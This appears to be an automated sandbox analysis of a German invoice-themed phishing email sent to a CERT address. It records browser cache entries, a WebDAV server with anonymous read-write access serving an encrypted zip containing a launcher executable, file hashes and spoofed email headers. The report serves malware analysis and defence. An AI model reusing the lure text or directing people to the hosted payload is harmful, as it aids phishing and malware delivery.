                              Preview:)]}'.["http://burrkeklprinting.tech",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 345

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (703)
                              Category:downloaded
                              Size (bytes):708
                              Entropy (8bit):5.150815413245801
                              Encrypted:false
                              SSDEEP:
                              MD5:BC9304BA84793B1C3F458032568755BB
                              SHA1:42DE1AFEF73F898063C42ABF6CA8C9A90E5774E5
                              SHA-256:C768B77EB912097F47E5263C112F77BB5C80A3DA513972E8F6FA0C94A0EF316E
                              SHA-512:F613F11EEF3A93F227171AF46B626DAA1FC7C59709CE96A22E5B159C1B702454E8C66D7D1D1A8A41BE70E0150A26AA8DCEA7C4B6FB663F3883219406E4068FC6
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fbu&oit=3&cp=9&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://bu",["http://buycrash.com/","http://business.nh.gov/platecheck/","http://businesssearch.sos.ca.gov/","http://business.google.com","http://bunzlconnect.com","http://buffalony.gov/pay","http://businessexpress.ny.gov","http://business.officedepot.com","http //burpsuite/cert","burp suite"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[807,806,805,804,803,802,801,800,601,600],"google:suggestsubtypes":[[44],[44],[44],[44],[44],[44],[44],[44],[512],[512,10]],"google:suggesttype":["NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","QUERY","QUERY"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 347

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (629)
                              Category:downloaded
                              Size (bytes):634
                              Entropy (8bit):4.949269210858244
                              Encrypted:false
                              SSDEEP:
                              MD5:9565A0838281EDE1A5F5272AECAFF8FF
                              SHA1:6ECFDC591C2A546C7C2ED5F2A93C14CAF5BA4FF1
                              SHA-256:14A86EA17CDFE7349F86A2E75EF737672EB0FED137D480000074F98395DBB9E2
                              SHA-512:60D8A63106BC2A2294DA63B8165607B80A940F09F8C2B7F06AC76EB8DA1A7433FD978407A7C5D244F707E9B63184AA54ADDA18DC2A9121028D3A97BC0BF976AF
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fburrkeklprinting.&oit=3&cp=24&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://burrkeklprinting.",["http //burrkeklprinting.com","http //burrkeklprinting.com login","http //burrkeklprinting.com reviews","http //burrkeklprinting.net"],["","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestdetail":[{"mp":"\u2026 ","t":"//burrkeklprinting.com"},{"mp":"\u2026 ","t":"//burrkeklprinting.com login"},{"mp":"\u2026 ","t":"//burrkeklprinting.com reviews"},{"mp":"\u2026 ","t":"//burrkeklprinting.net"}],"google:suggestrelevance":[601,600,551,550],"google:suggestsubtypes":[[160],[160],[160],[160]],"google:suggesttype":["TAIL","TAIL","TAIL","TAIL"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 348

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (602)
                              Category:downloaded
                              Size (bytes):607
                              Entropy (8bit):4.807666992258591
                              Encrypted:false
                              SSDEEP:
                              MD5:CE5B02E4D206A5CE2A62C775DC4E4192
                              SHA1:E262A43B392969EF625414B6417524A9F44450E6
                              SHA-256:3D93D6423E1510F50C5E37D45C37FCF33905BFA462DB1C29798BF3643258B5EB
                              SHA-512:0BED0E302224E29CB47D7C295449FF63FE81A68E692919D73FC8C63983F7DC38106ACC2666617C5499A03620AD257AECABB137461C1BE9C42A998FCB9308A35B
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A&oit=4&cp=5&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http:",["http status codes","http error 500","http 403","http 401","http error 503","http 503","http verbs","http 400","http 502","http //192.168.l.1"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[601,600,557,556,555,554,553,552,551,550],"google:suggestsubtypes":[[512,433,131],[512,433,131],[512,433,131],[512,433,131],[512,433],[512,433,131],[512,650,433,131],[512,433,131],[512,433,131],[512,433]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 349

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):392
                              Entropy (8bit):5.365296450147425
                              Encrypted:false
                              SSDEEP:
                              MD5:FB9F324BCF6F84470180BB5694751355
                              SHA1:F4B5EAE6EE40EA75FFDD3E62FBBC5AC0EEC7BF82
                              SHA-256:FC8DE36048B7D563D8314846A48141F16F92AC48DA12B3BB2A7CE6FBC6B74084
                              SHA-512:EBBF687625097669B669B805F15053B55628C2176F839542D4BB9D20961A4FD152F78D7B4BE166881A6AAA1B2AFC594B612EFCE9B9CB336DBF50B03ADDC66D51
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/favicon.ico
                              Preview:<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>.<html><head>. <meta http-equiv='Content-Type' content='text/html; charset=utf-8'>. <title>404 Not Found</title>.</head><body>. <h1>404 Not Found</h1>. <p>404 Not Found: /favicon.ico</p>.<hr/>.<a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-07-30 06:48:34.731361.</body></html>

                              Chrome Cache Entry: 350

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):1047
                              Entropy (8bit):4.80264980543363
                              Encrypted:false
                              SSDEEP:
                              MD5:7E2F53137DDE736517DC7D440D878EE7
                              SHA1:8D2E194FFCE24FB85BEA9AB91E3C886A3C515F7D
                              SHA-256:F2840B5CB81F737BC15CB28500F4B98AEECEDE1F1C3EEA0A1D14AFF06F43041A
                              SHA-512:5BD848C77A10D35812CFCEDA1A98DF0FCFAEF4027B2AFDF3B404004CB0238F4F464FC6735FB6CC8B0DEE4E916AA830A8590369AD358BE28CE55782B8E4A4F48D
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/:dir_browser/style.css
                              Preview:body {.. margin: 0;.. padding: 8px;.. font-family: Arial, "Helvetica Neue", Helvetica, sans-serif;..}..h1 {.. margin: 4px 0 4px 0;..}..img {.. border: 0;.. padding: 0 2px;.. vertical-align: text-bottom;..}..table.dir-listing {.. border: 0;.. border-collapse: collapse;..}..table.dir-listing tbody tr:hover..{.. background-color: #eee;..}..table.dir-listing tbody tr td a..{.. color: #000;.. text-decoration: none;..}..table.dir-listing tbody tr:hover td a..{.. text-decoration: underline;..}..table.dir-listing tr.directory td a..{.. font-weight: bold;..}..table.dir-listing tr td a.symlink {.. font-style: italic;.. color: darkmagenta;..}..table.dir-listing th,..table.dir-listing td..{.. padding: 2px 20px 2px 2px;.. /* text-align: left; */.. font-family: monospace;.. vertical-align: bottom;.. /* white-space: pre; */..}..table.dir-listing th:nth-child(3),..table.dir-listing td:nth-child(3)..{.. text-align: right;..}..p.auth-user {.. font-size: smaller;.. text-align: rig

                              Chrome Cache Entry: 351

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):1829
                              Entropy (8bit):4.94997172668402
                              Encrypted:false
                              SSDEEP:
                              MD5:26BA5D4AC6E00A97CFAE4B60BD815EFB
                              SHA1:CC815CC8E09924F371980AEEBD33522A83536E78
                              SHA-256:DDD6003F3201C23F6A4029DCAB56E2C8F77C758CD56F68E2C8F061AB75E70B28
                              SHA-512:45805758FC614626017CBEE43B8A3287AE26CD8FAB2F0B9DF02165E02716CE4C95FD2AA416329FFE33A3DF89C03213EF81AAFD69608D0FDC86C66BA6A9624029
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/E_TAX_DOC/
                              Preview:<!DOCTYPE html>.<html>.<head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="generator" content="WsgiDAV/4.3.0">. <title>WsgiDAV - Index of /E_TAX_DOC/ </title>. <link rel="shortcut icon" href="/:dir_browser/favicon.ico">. <link rel="stylesheet" href="/:dir_browser/style.css" />. <script defer src="/:dir_browser/script.js"></script>. <style type="text/css"> A {behavior: url(#default#AnchorClick);} </style>.</head>..<body onload="onLoad()">.. <h1>. <img class="logo" alt="WsgiDAV" title="WsgiDAV" src="/:dir_browser/logo.png">. Index of /E_TAX_DOC/. </h1>.. . <p class="auth-user">. Authenticated user: "anonymous", realm: "/", access: read-write.</p>. <hr>.. <table class="dir-listing" onclick="return onClickTable(event)">.. <colgroup>. <col>. <col>. <col class="right">. <col class="right">. </colgroup>.. <thead>. <tr>. <th>Name</th>. <th>Type</th>. <th>Size</th>. <th>Last

                              Chrome Cache Entry: 352

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (495)
                              Category:downloaded
                              Size (bytes):500
                              Entropy (8bit):4.813896307543885
                              Encrypted:false
                              SSDEEP:
                              MD5:381B1EE9745BA169121F1058D7382FB1
                              SHA1:DE5564FAC5A87D6899904206C8B4D3CDE38D225B
                              SHA-256:55D812CF7AA7D6050FCE63FE1C473DD0199158EA3A5E36E1D6B54A78F1C74CE4
                              SHA-512:4EAF3B0FE5518112CA74C29C554383F8BC552CA3794246C14FEA6E93FB3A85AE6BEE1D627208B9EB3E6AC04889AFA97A34163DBDBC91BEB11FCAE3EE422308E2
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fburrkeklprinting&oit=3&cp=23&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://burrkeklprinting",["http printingrinting.com","http printingrinting llc","http printingrinting inc"],["","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestdetail":[{"mp":"\u2026 ","t":"printingrinting.com"},{"mp":"\u2026 ","t":"printingrinting llc"},{"mp":"\u2026 ","t":"printingrinting inc"}],"google:suggestrelevance":[601,600,550],"google:suggestsubtypes":[[10,160],[10,160],[10,160]],"google:suggesttype":["TAIL","TAIL","TAIL"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 353

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 55 x 55, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):890
                              Entropy (8bit):7.673938930915189
                              Encrypted:false
                              SSDEEP:
                              MD5:A251CF6C53BF0956F4ECEE419DDE2EE1
                              SHA1:970D172E933436580E7176BF96D74C8B46A2871F
                              SHA-256:4B0FB440200468C36ED851DED27258B59B6BE524482EA37B9A745AC97EC615CD
                              SHA-512:AAFF1E1B973A13BCF974232B12A600744B9D92E00C8FC03CB21BDF8BA4F99D74732C628BA1255225F89CAD5576C5B76F77E50C612C257286EF9F185BE8D7E016
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/:dir_browser/logo.png
                              Preview:.PNG........IHDR...7...7........F...AIDAThC.Y!l.A.....HV * 9.........2...H**..*..s@.8A....b..4.q.Q..V.....D.....fw..........2................K...<...g..G.9...V.....R*%.\V....JU..CqL.jQ..A..3p..n..1u../...S..u..}..=..@.67)...[.F........a.....C..{H..e....<@.z...M.~....VD......'. 0.....\.|...A.FD`L......c.u.n..._....o^m.....S....(....ph.$..M..h..|.jS......y..a8LL%.)Z....{..v.`...l.wo&E2...]@{.d...;....b.8....(..Q..].x.2...........f.i.]0.Ba..M\.*8.C.a09gS..9.....l?.........?z].......R.I4....@.tS.u.!^..V.....d.WlSe....Y.....R&#K...L.V0..9..'.!...U.....=q.N9......S.f|s..;....T'.6.6.....Z.p'.jlJ.....s.a`..q.....Lv5..&.B..zTq.e.....f.'...`.....".......j #...d9.P.....W..P.e....fp.s.b.....8d.[....<..<U..?..zpH"..=...d.e.9...roC.zS......)./..7..t..\...g0....z../..O.n.e..f..6.H.j.\M/....?..gW3..W...{..f`.\..:..sV...........3.`....IEND.B`.

                              Chrome Cache Entry: 356

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (671)
                              Category:downloaded
                              Size (bytes):676
                              Entropy (8bit):5.102639926364041
                              Encrypted:false
                              SSDEEP:
                              MD5:AB113ED2A6B10FD210D87B6506BB871A
                              SHA1:9A914D85E9467D362AA2B0BA3317524CB6C512D4
                              SHA-256:7E168F36F77F9B3F35764364B3C5B9BA7C9279C28E075308DB3A99483E8EA843
                              SHA-512:AB5EE3022F22DD21AE0E9DBBC2E89495A8983C9EF2E0963AC40C1A8EA9CA6C4EF8791AA262A9DA6E9813E3CD068454371312776083F5D334B4448F53975DE44C
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fburr&oit=3&cp=11&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://burr",["http://burr.com","http://burr.com/payment","burr.com ceo","burr computer environments","burr comb","burr comedian","burr commack","burr computer environments website","burr \u0026 company","burr computer environments india private limited"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"phi":0,"pre":0,"tlw":false},"google:suggestrelevance":[852,800,601,600,555,554,553,552,551,550],"google:suggestsubtypes":[[44],[44],[512,13],[30,13],[30,13],[30,13],[30,13],[30,13],[30,13],[30,13]],"google:suggesttype":["NAVIGATION","NAVIGATION","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 358

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 1 icon, 55x55, 32 bits/pixel
                              Category:dropped
                              Size (bytes):12602
                              Entropy (8bit):2.52330818414669
                              Encrypted:false
                              SSDEEP:
                              MD5:2C2951F9C795C19412BF900F8E0EA00E
                              SHA1:F0C457C38A8F194EB00C7EE1CAEDD78D7C062C6B
                              SHA-256:ED50E2FACAD39039D06D6A2F858FB8F93AD4EAEFA3F64D6871260D29F276D515
                              SHA-512:9816FD258A78FBADCB82D572D58E06A6BFB4B37B36146C41BAE3DB4A9857CB0744496870BEEE33C862473ED5C751D703A00CB6294E2957CC2F756909CCC415F8
                              Malicious:false
                              Reputation:unknown
                              Preview:......77.... .$1......(...7...n..... .....D/...................XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..XE..X

                              Chrome Cache Entry: 359

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (672)
                              Category:downloaded
                              Size (bytes):677
                              Entropy (8bit):5.061873968532851
                              Encrypted:false
                              SSDEEP:
                              MD5:20A9FCDB12CDD75588D07DFA736CDF53
                              SHA1:0A0EE2D1A52800E2E1570B84BDDCCEE3300C2B96
                              SHA-256:4D0D326CD1C2A447EBF4FCC332E7F5BB6FA85F2BEE3A0CD524CDF3CF850D0E18
                              SHA-512:7A40C94244949440942E1175E61BD8A9EF332FB59A8D277E747238EA85ABC698CF9678DA1641CC16E9884B5A11C3CEF91461C34F42E9400E92AC59B2A7708AD3
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2F&oit=4&cp=7&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://",["http //192.168.l.1","http //192.168.l.254","http //10.0.0.0.1","http //localhost/8080","http //mobile. hotspot","http //192 l.168.0.1","http //localhost","http //fortnite.com/2fa ps5","http //my.jetpack","http://fortnite.com/2fa"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[601,600,556,555,554,553,552,551,550,400],"google:suggestsubtypes":[[512,433],[512,433,131],[512],[512,650,433,131],[512],[512,433,131],[512,650,433,131],[512,433,131],[512],[44]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","NAVIGATION"],"google:verbatimrelevance":851}]

                              Chrome Cache Entry: 360

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):3285
                              Entropy (8bit):4.606952667300754
                              Encrypted:false
                              SSDEEP:
                              MD5:EF2A6CA7AD2908091ED252D7164B6DA8
                              SHA1:547A77BCD3F7759CB208686080207777DFF1489A
                              SHA-256:ECC7DEF7E9AEE6A4493EFA1A2EB372020777D015F08F4D80D55C28CF4C0B8130
                              SHA-512:8A09915F2542B4B6A85B69D2AC18D77504A47F5237066F57B0B0EB8B739565F59CC29DAAB8399C789AFD932EFEA75B5CB70151A8EB7D60699F5EF59AFEF9ED59
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/
                              Preview:<!DOCTYPE html>.<html>.<head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="generator" content="WsgiDAV/4.3.0">. <title>WsgiDAV - Index of / </title>. <link rel="shortcut icon" href="/:dir_browser/favicon.ico">. <link rel="stylesheet" href="/:dir_browser/style.css" />. <script defer src="/:dir_browser/script.js"></script>. <style type="text/css"> A {behavior: url(#default#AnchorClick);} </style>.</head>..<body onload="onLoad()">.. <h1>. <img class="logo" alt="WsgiDAV" title="WsgiDAV" src="/:dir_browser/logo.png">. Index of /. </h1>.. . <p class="auth-user">. Authenticated user: "anonymous", realm: "/", access: read-write.</p>. <hr>.. <table class="dir-listing" onclick="return onClickTable(event)">.. <colgroup>. <col>. <col>. <col class="right">. <col class="right">. </colgroup>.. <thead>. <tr>. <th>Name</th>. <th>Type</th>. <th>Size</th>. <th>Last modified</th>.

                              Chrome Cache Entry: 361

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:downloaded
                              Size (bytes):25269968
                              Entropy (8bit):7.99932280953398
                              Encrypted:true
                              SSDEEP:
                              MD5:7A56FB5DE067AB5D49C5547E57C4577D
                              SHA1:D1248A8E67F8434AD9AF3103FA48DAAB7CCD42ED
                              SHA-256:1B9E4780EF9FFE4B7B55CCFF2EECD69895A9815F742311FD620F9CEBEA5E0EF2
                              SHA-512:3E529E328C7F660E2C84B8616EDD52CD1E661EB7C38F09057ED3092778A899DD282A25EE714C3B5BD225A46B47D488D2D0A68F550E736A27D44C6687406E11A8
                              Malicious:false
                              Reputation:unknown
                              URL:http://burrkeklprinting.tech:4098/FTSP.zip
                              Preview:PK.........B.X................Print/Launcher/PK........Vv.Xn...44..........Print/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...Bh

                              Chrome Cache Entry: 372

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (710)
                              Category:downloaded
                              Size (bytes):715
                              Entropy (8bit):5.235285916287269
                              Encrypted:false
                              SSDEEP:
                              MD5:38C3F5FF183DB9D0460D1B749AA77C2F
                              SHA1:3F096B7D847CE83674EC36A46F5AC021B2A7FC8D
                              SHA-256:91BEB415B36F11E5317CD177106CBB673C488CD6EDCBE477BA0E08D546C9A40C
                              SHA-512:264FDA7336C6C7043685162A1E6F680C001B0152D4E483277EFEB9D196636D3561D868767EF137EF043892572D039C610CF3943C9A0D748702C924F25600266D
                              Malicious:false
                              Reputation:unknown
                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Fb&oit=3&cp=8&pgcl=4&gs_rn=42&psi=4joLTXMi0VRfS81N&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                              Preview:)]}'.["http://b",["http://baltimorecity.gov","http://benefits.l3harris.com","http://bwi.iet-ls.com","http://benefits.oregon.gov","http://booking.com","http://bit.ly","http //bwc.brother.com temporary id","http //belkin.range","http //bookblast.booksarefun.com register","http //blue-verified-badge-for-facebook-free@"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[805,804,803,802,801,800,601,600,551,550],"google:suggestsubtypes":[[44],[44],[44],[44],[44],[44],[512],[512],[512],[512]],"google:suggesttype":["NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","NAVIGATION","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":851}]

                              Static File Info

                              General

                              File type:CDFV2 Microsoft Outlook Message
                              Entropy (8bit):3.6215149122513313
                              TrID:
                              • Outlook Message (71009/1) 58.92%
                              • Outlook Form Template (41509/1) 34.44%
                              • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                              File name:EXTERN Zahlungsbest#U00e4tigung.msg
                              File size:50'176 bytes
                              MD5:c5b5b77587dc74ae4ec2f8b65567fbea
                              SHA1:3de09091c51e128b3b524547c3a8c85d0e3a7c08
                              SHA256:679d02840a8f742969bd78e18e80cd98f5844ff4460d01b889972ed395377f7d
                              SHA512:84d63d2cd3c14cf616bc50349c83726d4910fff105687616c657a4a65bd2376b957da9080253fdf10bd250a9ff9ae6465ee706f15c1f464f14a0eb0908893ee4
                              SSDEEP:768:avvFsK1uEsKIpBXva/T8mREmKhpcxhvHO64e4:q9FQpBXmRj2
                              TLSH:B0338B2536E95705F2BAEF360EF2C0978526BCC1ED24878F3291734E1971A40A971B7B
                              File Content Preview:........................>......................................................................................................................................................................................................................................

                              Static Mail

                              General

                              Subject:[EXTERN] Zahlungsbesttigung
                              From:<Management@pclmspx005.dpaorinp.de>, <roland@marines.com>
                              To:<cert@certnord.de>
                              Cc:
                              BCC:
                              Date:Mon, 29 Jul 2024 20:05:24 +0200
                              Communications:
                              • Bitte beachten Sie die beigefgte bezahlte Rechnung. Vielen Dank fr Ihr Geschft. _____ Haftungsausschluss Die in dieser Mitteilung des Absenders enthaltenen Informationen sind vertraulich. Sie sind ausschlielich fr den Empfnger und andere Personen bestimmt, die zum Empfang berechtigt sind. Wenn Sie nicht der Empfnger sind, werden Sie hiermit darber informiert, dass jegliche Offenlegung, Vervielfltigung, Verbreitung oder Manahmen in Bezug auf den Inhalt dieser Informationen streng verboten und mglicherweise rechtswidrig sind. Diese E-Mail wurde auf Viren und Malware geprft und mglicherweise automatisch von Mimecast archiviert, einem fhrenden Unternehmen fr E-Mail-Sicherheit und Cyber-Resilienz. Mimecast integriert E-Mail-Abwehr mit Markenschutz, Schulungen zur Sensibilisierung fr Sicherheit, Websicherheit, Compliance und anderen wichtigen Funktionen. Mimecast hilft dabei, groe und kleine Organisationen vor bswilligen Aktivitten, menschlichen Fehlern und technischen Fehlern zu schtzen und die Bewegung hin zu einer widerstandsfhigeren Welt anzufhren. Weitere Informationen finden Sie auf unserer Website.
                              Attachments:
                              • Rechnung Nr. 17735360.html

                              Headers

                              Key Value
                              Receivedfrom [127.0.0.1] (helo=ec2-18-196-50-126.eu-central-1.compute.amazonaws.com)
                              Transport; Tue, 30 Jul 2024 0934:54 +0200
                              2024 0934:54 +0200
                              for <cert@certnord.de>; Tue, 30 Jul 2024 0934:53 +0200 (CEST)
                              for <cert@certnord.de>; Mon, 29 Jul 2024 2005:25 +0200 (CEST)
                              X-TM-AS-ERS194.28.225.96-127.5.251.1
                              X-TM-AS-SMTP1.0 bXgyLm9uZGF0YXBvcnQuZGU= cm9sYW5kQG1hcmluZXMuY29t
                              X-DDEI-TLS-USAGEUsed
                              X-Virus-ScannedDebian amavisd-new at lclmspa027.dpaorinp.de
                              X-Spam-FlagNO
                              X-Spam-Score0.412
                              X-Spam-LevelX-Spam-Status: No, score=0.412 tagged_above=-1000 required=50
                              Mon, 29 Jul 2024 2005:24 +0200
                              Reply-To<office1@twincitiesusedofficefurniture.com>
                              From<Management@pclmspx005.dpaorinp.de>, <roland@marines.com>
                              To<cert@certnord.de>
                              Subject[EXTERN] Zahlungsbest=?UTF-8?B?w6R0aWd1bmc=?=
                              DateMon, 29 Jul 2024 18:05:24 +0000
                              Message-ID<20240729180524.D067DEB5FF5B00CC@marines.com>
                              MIME-Version1.0
                              Disposition-Notification-To<direccion@delher.com.mx>
                              Content-Typemultipart/mixed;
                              X-TMASE-VersionDDEI-5.1-9.1.1004-28562.000
                              X-TMASE-Result11-111.257900-10.000000
                              X-TMASE-MatchedRIDUXfEzgTSnnMEC8rNTltqbAeLCIX046iBjNLxrcxKViWsFJeHnIHZi65d
                              X-TMASE-SNAP-ResultNot scanned
                              X-TMASE-INERTIA0-0;;;;
                              X-TMASE-XGENCLOUD3a2ce2fc-0c98-4705-a8cc-915f13bf43c0-115-0-200-0
                              X-TM-AS-ResultYes-111.258-4.0-31-11
                              Return-Pathroland@marines.com
                              X-MS-Exchange-Organization-Network-Message-Id7de25904-908c-483f-924a-08dcb06a1af3
                              X-MS-Exchange-Organization-AVStamp-MailboxSMEXJnq?;1949900;0;This mail has
                              X-MS-Exchange-Organization-SCL9
                              X-MS-Exchange-Organization-AuthSourceWCLMSPA067.dpaorvv.de
                              X-MS-Exchange-Organization-AuthAsAnonymous
                              X-MS-Exchange-Transport-EndToEndLatency00:00:00.2033054
                              X-MS-Exchange-Processed-By-BccFoldering15.02.1544.011
                              dateMon, 29 Jul 2024 20:05:24 +0200

                              File Icon

                              Icon Hash:c4e1928eacb280a2